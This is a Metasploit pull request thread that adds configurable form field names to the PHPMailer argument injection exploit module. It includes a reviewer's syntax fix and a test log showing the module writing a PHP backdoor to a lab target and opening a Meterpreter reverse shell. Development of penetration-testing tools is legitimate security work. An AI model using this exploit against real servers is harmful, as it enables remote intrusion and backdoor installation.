Phpmailer arg injection update
rapid7/metasploit-framework pull request #16721
Opened 2022-06-27 21:08 UTC by erikbomb

Added Advanced options to change the name of the fields for the name, email, and message objects.  Set the default to the previous hard coded value.

No changes to the functionality of the code just adding the ability for users to modify values.  Edited previous advanced option to comply with camel case.  

Also went to the documentation and added the new advanced options.

This update was in the attic (Did not have time to work on this for a while sorry!)   [RE #15810](https://github.com/rapid7/metasploit-framework/pull/15810)
Thanks for the help!

## Verification

- [x] Start `msfconsole`
- [x] `use exploits/multi/http/phpmailer_arg_injection`
- [x] `set NAME_FIELD different_name`

@smcintyre-r7

2022-06-28 17:54 UTC, smcintyre-r7 requested changes

2022-06-28 17:54 UTC, smcintyre-r7 commented on modules/exploits/multi/http/phpmailer_arg_injection.rb
> +        OptString.new('MessageField', [true, 'Name of the element for the Message field', 'message'] regex: /^([^\t\n\f \/>"'=]+)$/)
Looks like a syntax error here is causing the unit tests to fail.

```suggestion
        OptString.new('EmailField', [true, 'Name of the element for the Email field', 'email'], regex: /^([^\t\n\f \/>"'=]+)$/),
        OptString.new('MessageField', [true, 'Name of the element for the Message field', 'message'], regex: /^([^\t\n\f \/>"'=]+)$/)
```

2022-06-29 09:08 UTC, erikbomb commented on modules/exploits/multi/http/phpmailer_arg_injection.rb
> +        OptString.new('MessageField', [true, 'Name of the element for the Message field', 'message'] regex: /^([^\t\n\f \/>"'=]+)$/)
Thanks!

2022-06-29 16:30 UTC, smcintyre-r7 commented
Tested this successfully and everything is looking good. Changing the field datastore options will affect success, so I left them at their default values but confirmed they were changing the outcome. Once the unit tests pass, I'll get this landed.


```
[*] Processing /home/smcintyre/.msf4/msfconsole.rc for ERB directives.
resource (/home/smcintyre/.msf4/msfconsole.rc)> load request
[*] Successfully loaded plugin: Request
resource (/home/smcintyre/.msf4/msfconsole.rc)> load versions
[*] versions plugin loaded.
[*] Successfully loaded plugin: versions
resource (/home/smcintyre/.msf4/msfconsole.rc)> loadpath test/modules
Loaded 38 modules:
    14 auxiliary modules
    13 exploit modules
    11 post modules
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Writing the backdoor to /www/q19zYsn1.php
[*] Sleeping before requesting the payload from: /q19zYsn1.php
[*] Waiting for up to 300 seconds to trigger the payload
[+] Successfully found the payload
[*] Sending stage (39927 bytes) to 172.17.0.2
[+] Deleted /www/q19zYsn1.php
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.17.0.2:40494) at 2022-06-29 12:04:52 -0400
[+] Successfully triggered the payload

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.128 - Meterpreter session 1 closed.  Reason: Died
```

2022-06-29 16:55 UTC, smcintyre-r7 approved these changes

2022-06-29 17:01 UTC, merged